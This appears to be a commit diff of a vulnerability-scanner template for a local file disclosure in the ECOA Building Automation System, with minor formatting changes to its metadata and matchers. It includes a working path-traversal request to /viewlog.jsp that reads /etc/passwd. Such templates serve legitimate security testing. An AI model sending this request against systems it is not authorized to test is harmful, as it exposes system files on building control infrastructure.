Update ecoa-building-automation-lfd.yaml
parent
01eb1cf559
commit
428be9721b
|
@ -1,30 +1,21 @@
|
|||
id: ecoa-building-automation-lfd
|
||||
|
||||
info:
|
||||
name: ECOA Building Automation System Local File Disclosure
|
||||
info:
|
||||
author: 0x_Akoko
|
||||
name: "ECOA Building Automation System Local File Disclosure"
|
||||
reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php"
|
||||
severity: high
|
||||
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
|
||||
tags: ecoa,lfi
|
||||
tags: "ecoa,lfi"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /viewlog.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
|
||||
|
||||
matchers-condition: and
|
||||
|
||||
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
|
||||
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- "root:.*:0:0:"
|
||||
|
|
Loading…
Reference in New Issue